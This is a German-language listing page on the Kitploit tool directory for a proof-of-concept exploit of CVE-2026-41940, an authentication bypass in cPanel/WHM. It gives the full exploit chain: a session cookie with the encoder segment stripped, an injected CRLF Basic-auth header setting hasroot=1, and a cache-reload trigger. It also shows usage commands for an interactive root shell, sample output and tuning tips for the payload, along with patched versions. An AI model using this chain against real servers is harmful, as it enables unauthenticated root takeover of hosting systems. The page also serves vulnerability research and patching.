Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CPANEL-CVE-2026-41940 — Proof-of-Concept-Exploit für CVE-2026-41940, eine kritische Authentifizierungsumgehung in cPanel/WHM über CRLF-Injection, die nicht authentifizierten Root-Zugriff und eine interaktive Shell ermöglicht. | Kitploit
Tools/GitHubGitHub/0xabdoulaye/cpanel-cve-2026-41940
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHub0xabdoulaye/cpanel-cve-2026-41940

CPANEL-CVE-2026-41940

Proof-of-Concept-Exploit für CVE-2026-41940, eine kritische Authentifizierungsumgehung in cPanel/WHM über CRLF-Injection, die nicht authentifizierten Root-Zugriff und eine interaktive Shell ermöglicht.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
21vor 3 MonatenNoch nicht geprüft

CVE-2026-41940 — cPanel/WHM Authentifizierungsumgehung

Autor: SilySec
Originalforschung: Sina Kheirkhah (@SinSinology) / watchTowr Labs
Schweregrad: Kritisch (CVSS 9.8)
Typ: CRLF-Injection → Authentifizierungsumgehung → Root-Shell


Beschreibung

CVE-2026-41940 ist eine kritische Schwachstelle in cPanel/WHM, die es einem nicht authentifizierten Angreifer ermöglicht, über eine CRLF-Injection im Basic-Authentifizierungsmanager von cpsrvd vollständigen Root-Zugriff zu erlangen.

Die Schwachstelle kombiniert drei Schwächen:

  1. Ungefilterte CRLF-Injection — die Funktion saveSession() in Cpanel/Session.pm bereinigt die Zeichen \r\n nicht vor dem Schreiben auf die Festplatte, wenn der Schlüssel <ob> im Cookie fehlt.
  2. Deaktivierter Encoder — ohne das Segment <obHEX> im Session-Cookie wird der Session-Encoder nicht aktiviert, sodass die CRLF-Bytes im Klartext in die Session-Datei geschrieben werden.
  3. Cache-Neuladen — Cpanel::Session::Modify::save() liest die Rohdatei erneut und befördert die injizierten CRLF-Schlüssel in den JSON-Cache, wodurch die Session vollständig authentifiziert wird.

Betroffene Versionen


Exploit-Kette

root@kitploit:~
POST /login/?login_only=1          [falsches Passwort]
  └─► cookie: whostmgrsession=:ID,<obHEX>

,<obHEX> entfernen  →  :ID          [deaktiviert den Encoder]

GET / + Cookie: :ID
      + Authorization: Basic root:x\r\nhasroot=1\r\n...
  └─► cpsrvd schreibt die rohen CRLF-Bytes in die Session-Datei

GET /scripts2/listaccts + Cookie: :ID   [ohne Sicherheits-Token]
  └─► do_token_denied() → Cpanel::Session::Modify::save()
  └─► JSON-Cache wird mit hasroot=1, tfa_verified=1 neu aufgebaut

→ Session als root authentifiziert

Verwendung

Voraussetzungen

root@kitploit:~
pip install requests
# Für den --terminal-Modus (optional):
pip install paramiko

Überprüfung der Schwachstelle

root@kitploit:~
python3 poc.py --target https://ZIEL:2087

Interaktive Root-Shell erhalten

root@kitploit:~
python3 poc.py --target https://ZIEL:2087 --terminal

Kanonischen Hostnamen erzwingen

root@kitploit:~
python3 poc.py --target https://1.2.3.4:2087 --hostname cpanel.beispiel.com

Beispielausgabe

root@kitploit:~
[*] target   : https://1.2.3.4:2087
[*] canonical: cpanel.beispiel.com

[1/4] minting preauth session ...
       session  = :AbCdEfGh...,0123456789abcdef
       stripped = :AbCdEfGh...

[2/4] injecting CRLF payload ...
       307 → leaked token = /cpsess1234567890

[3/4] triggering cache propagation ...
       do_token_denied → Cpanel::Session::Modify::save() fired

[4/4] verifying root access ...

  ✔  AUTH BYPASS CONFIRMED
     cPanel version : 11.136.0.5
     cookie         : whostmgrsession=%3AAbCdEfGh...
     WHM URL        : https://1.2.3.4:2087/cpsess1234567890/

Wichtige technische Punkte

  • Der kanonische Hostname muss im Host-Header verwendet werden (nicht die IP) — cpsrvd verwaltet Sessions je nach Hostname unterschiedlich
  • Der Zeitstempel im Payload muss 9999999999 sein (fest, ferne Zukunft) — ein aktueller Zeitstempel schlägt fehl
  • Die Reihenfolge der Schlüssel im injizierten Payload ist wichtig: successful_internal_auth_with_timestamp muss zuerst kommen

Patch

Der Patch verschiebt den Aufruf von filter_sessiondata() in saveSession() und fügt eine bedingte Kodierung hinzu, wenn der Schlüssel <ob> fehlt, wodurch jegliches Schreiben im Klartext verhindert wird.

cPanel/WHM sofort auf die oben aufgeführten korrigierten Versionen aktualisieren.


Warnhinweis

Dieses Tool wird ausschließlich zu Forschungs- und internen Testzwecken bereitgestellt. Jegliche Nutzung auf Systemen ohne ausdrückliche Genehmigung ist illegal. SilySec übernimmt keine Haftung für missbräuchliche Verwendung.

Tool herunterladen
BranchLetzte verwundbare VersionKorrigierte Version
110.0.x11.110.0.9611.110.0.97
118.0.x11.118.0.6211.118.0.63
126.0.x11.126.0.5311.126.0.54
132.0.x11.132.0.2811.132.0.29
134.0.x11.134.0.1911.134.0.20
136.0.x11.136.0.511.136.0.6